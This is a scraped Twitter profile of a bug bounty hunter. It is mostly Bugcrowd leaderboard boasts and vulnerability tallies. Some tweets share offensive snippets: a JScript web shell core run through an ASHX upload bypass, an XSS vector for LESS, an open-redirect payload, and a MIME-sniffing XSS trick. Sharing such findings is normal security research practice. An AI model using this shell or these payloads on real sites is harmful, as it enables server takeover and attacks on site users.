ππππ π¦§
@mertistaken
Followers
6,736
Following
572
Media
52
Statuses
342
hacker / bug bounty hunter / all-time rank #2 on @bugcrowd ()
Joined January 2013
Don't wanna be here?
Send us removal request.
Explore trending content on Musk Viewer
Covid
• 723731 Tweets
#ΰΈ«ΰΈ’ΰΈ²ΰΈΰΉΰΈΰΈΰΈ£OSTΰΈΰΈ΄ΰΉΰΈΰΈ ΰΈ±ΰΈΰΈΰΈ΄ΰΉ
• 163737 Tweets
ζ’
ι¨ζγ
• 136237 Tweets
Worship The Next Prince
• 111581 Tweets
Peter Navarro
• 92950 Tweets
TNP X ZEENUNEW
• 69676 Tweets
Schumer
• 65388 Tweets
Botafogo
• 53037 Tweets
Angela
• 48653 Tweets
#BB26
• 47118 Tweets
Matt Gaetz
• 46465 Tweets
#AEWDynamite
• 40367 Tweets
Caitlin Clark
• 40120 Tweets
Abel
• 26655 Tweets
O GrΓͺmio
• 23922 Tweets
Ramirez
• 23380 Tweets
Gold Star
• 19513 Tweets
Botox
• 13762 Tweets
Rony
• 13302 Tweets
Alisson
• 13232 Tweets
Okada
• 12346 Tweets
Ospreay
• 11748 Tweets
ι’ζ±η²δΏ‘
• 10677 Tweets
I got my biggest reward ever ($20k) for a single submission. also, includes the best bonus reward I've ever get on
@bugcrowd
. it's great to hear things like this from the clients. π
29
11
477
I blogged an interesting P1 vulnerability about SSTI. ππ
Limited FreeMarker SSTI to arbitrary LiQL query and manage Lithium CMS -
#BugBounty
6
164
367
March π₯π₯ congrats to all hunters π
P1s:
SQLi x3
IDOR x2
RCE x2
Info (session) Leak x1
one of the RCEs: a website was blocking ASPX file uploads. bypassed it by uploading an ASHX file and triggering it to create an ASPX shell on same dir.
ASHX shell:
27
44
369
Such a nice ending! I have reported ~490 (non-duplicate) bugs and ~90 of them were critical vulnerabilities. Thanks to the
@Bugcrowd
team for all the opportunities it provided in 2022, 90% of these numbers come from them. β€οΈ
22
5
274
Another great month was June. Statistics for accepted submissions -except dupes- on 13 different programs are as follows;
x10 - SQLi
x14 - Business Logic
x3 - SSTI/RCE
x1 - LFI
x23 - XSS
Congrats to all researchers, thanks
@Bugcrowd
π
13
9
252
I have 413 (includes 63 criticals) vulnerabilities rewarded on
@Bugcrowd
in 2021. It was a very fun as well as busy year. Thanks to the whole team. π
14
10
213
XSS attack vector for LESS: a{b:`function(){alert(1)}()`;}
2
75
210
feb dump π even though I was inactive for 2 weeks in February I ranked 1st in the monthly leaderboard thanks to subs waiting in triage from many different programs. π
8x p1
- 4x SQLi
- 2x RCE
- 1x AuthBypass
- 1x LFI
3x p2
18x p3
6x p4
the big bounties came
22
4
212
I think quality is more important than quantity, but I have achieved some numerical goals that are important to me.
I passed 30k+ points on the all-time leaderboard, 3k+ valid vulnerabilities, and reached 300+ P1s.
Thanks to
@Bugcrowd
for these great opportunities. ππ»
31
2
164
Focused work brings success. Congrats to all researchers on the July leaderboard! 90% of my July submissions are business logic vulnerabilities. They are everywhere and require manual hunting mostly. I suggest everybody who wants to find something easily check them out. β₯οΈ
11
3
152
I guess this is my personal record in the
@Bugcrowd
monthly leaderboard, it was a tiring but fun month. Thanks to the whole team for the quick actions and congratulations to everyone on the list!
13
0
122
(1/4) I faced an interesting scenario about browser behaviors after discovering an unexploitable Reflected XSS.
Since this HTTP response does not contain the Content-Type header, the browser will "MIME sniffing" by analyzing the content.
#bugbounty
#bugbountytips
3
13
118
May π₯ congrats to all hunters! I'm grateful to
@Bugcrowd
for the amazing opportunities provided. β€οΈ
With 12 non-dupe P1s in May, I increased the count to ~290 on P1-warrior. The current P1-Warrior goal is 300! ππ»
11
3
116
September and October, a monthly streaaaak! π₯ It was a great two months, I really love hacking. Most of this month came from the
@FISGlobal
team, thanks so much for the great rewards.
Congrats to all the researchers! ππ»
@Bugcrowd
π§‘
14
1
109
I came to the end of a fun 5 years and left my job at the end of March. I'll continue as a full-time bug bounty hunter from now on. I've been planning to do it for a long time, I think it will be fun. π Thanks to
@PicusSecurity
for every opportunity provided. ππ»
15
1
95
it was a fun month. congrats to all researchers and thanks to the whole
@Bugcrowd
team. π
#ItTakesACrowd
6
2
91
I want to share a small and nice example where I can quickly present the impact of the bug. in one of the SQLi submissions:
I saw an error message starting with "org.hibernate.QueryException" in a request's response. then I realized that HQL injection is possible here, but since
5
9
89
good closing. π thanks to the whole
@Bugcrowd
team for this exciting year. happy *healthy* new year!
1
2
84
My new payload: '/\mert%252eninja'. Open redirect is fun!
3
23
75
September was a great month in which I had the opportunity to discover critical vulnerabilities in many different
@Bugcrowd
programs. It's a great feeling when the effort pays off! ππ»
7
0
51
Kudos β€οΈ
Thank you
@Bugcrowd
!
And the bug hunter with the most Kudos points in 2016 is
@merttasci_
! Congrats on your hard work on Kudos only programs!
#ItTakesACrowd
0
2
20
12
4
48
We wrote something about IDOR bugs w/
@evrnyalcin
. Thanks for sharing
@Bugcrowd
! ππ
Great guest post from
@merttasci_
&
@evrnyalcin
on how to find IDOR bugs for large bounty rewards:
#ItTakesACrowd
2
57
120
3
14
44
2021-Q1 MVP π₯³
π MVP's for Q1 are here π
Congratulations to all of the Q1 MVP's! Thank you for putting in the hard work and making the internet a safer place π§‘
6
8
109
2
1
43
We (w/
@EmreOvunc
) finished the first round of the
@Bugcrowd
HackerCup event in 2nd place. Good luck to all participants! π§
#HackerCup2022
#BCTeamHunt
1
1
33
I was placed 2nd on the Bugcrowd's June Leaderboard.
6
2
29
3
5
28
thank you π
π Announcing our Q3 2019 Bounty Slayers! π
We're constantly amazed by the awesome work from the
#Crowd
, keep crushing it!
#ItTakesACrowd
1
6
36
2
0
23
I'll share some posts that include my experiences usually related to web application security.
#bugbounty
0
8
25
motivation++;
Small things from the client can increase motivation for researcher.
1
1
23
Bug counter ππ Lametric is fun for those who like play with apis. π
2
0
22
I tried the existing ASHX shells but they failed, I edited one of them to get the C# exploit code as base64 and π₯.
decoded base64:
var shell = new ActiveXObject("");
var cmd = "cmd.exe /c dir";
var output = shell.Exec(cmd).StdOut.ReadAll();
output;
0
0
19
(4/4) It's worth noting that this technique only seems to work in Firefox, and the page was an error page so that any extension could be added to the end of the address. π
0
0
16
Thanks
@Bugcrowd
π
1
0
15
π₯³π₯³
Bugcrowd has no limit to the amount of amazing researchers, but every once in a while a researcher comes along and shows value, impact and skill above all others!
Huge shout out and congrats to all of the Q4 Bugcrowd MVPs. Did you qualify?
2
10
59
1
0
14
@_HappyHacker_
@nayeems3c
@_2os5
If I have time I test many features of the app for idor, priv esc and unauth access bugs (if there is no time or the application is too large, I only test the most important features).
1
0
13
(3/4) However, I didn't have a chance to change the start of the content so I tried a different way and exploited the vulnerability by appending '.html' to the end of the URL, forcing the browser to interpret the content as HTML. π₯
1
0
13
week 3 failed :( but this was a good challenge, thanks
@bugcrowd
!! also, congrats to all winners!
Weβre so excited to announce the winners for the Bugcrowd October Challenge month!
With tons of spooky submissions from the Crowd, huge thanks for all of your hard work, tweets and messages about the
#BugcrowdChallenge
. Spooky swag incoming! π π
0
5
41
0
0
13
πΊπΊ
Congratulations to all our Researchers who have met and continue to maintain their 2018
#MVP
qualifications!
#ItTakesACrowd
#OuthackThemAll
0
0
11
4
0
13
It was an exciting year, thanks
@bugcrowd
. See you at the end of 2017! π
Bugcrowd Celebrates Top Researchers with 2016 Bug Bounty Bonus Awards
8
6
34
0
0
11
(2/4) Then I noticed that the browser interprets it as plain text because the content doesn't start with an HTML tag.
If the content started directly as "<img src=x..." it would be interpreted as HTML even if the Content-Type header is not set.
1
0
10
Also, thanks to the
@synack
team for the remaining 10%. Good luck to all researchers for 2023, I hope everyone reaches their goals. π
0
0
8
@parkerzanta
this was also in the βindeedβ program. maybe it can help you to increase the impact
1
1
7
Looks great. :)
1
1
8
0
0
8
Yay! π
0
2
7
0
0
7
@NahamSec
Don't relax and drop the test if you find an important bug! Try to dig deeper, if you find one, you can find more than one.
0
0
5
2
0
5
@Bugcrowd
@mert
@mzamat123
@CharlieEriksen
@GodfatherOrwa
@sw33tLie
congrats to all hunters! π also to
@mert
π
1
0
4
@krishnsec
@Masonhck3571
@Bugcrowd
it feels good to see hard work pay off but it'd be better to ask this question to
@codecancare
π
2
0
4
@haxor31337
@Bugcrowd
@GodfatherOrwa
@codecancare
@XHackerx007
@vinnyvinoth242
congrats mate. great success π₯π₯
0
0
3
@iamnoooob
@Bugcrowd
huh! $337.07... Found the cause of my last dupe reports. :) Great job bro, congrats! ^_^
1
0
4
@_HappyHacker_
@nayeems3c
@_2os5
I'm trying to understand how the app works and imagine what weird things might be. β₯οΈ
1
0
4
0
0
2
1
0
3
1
0
3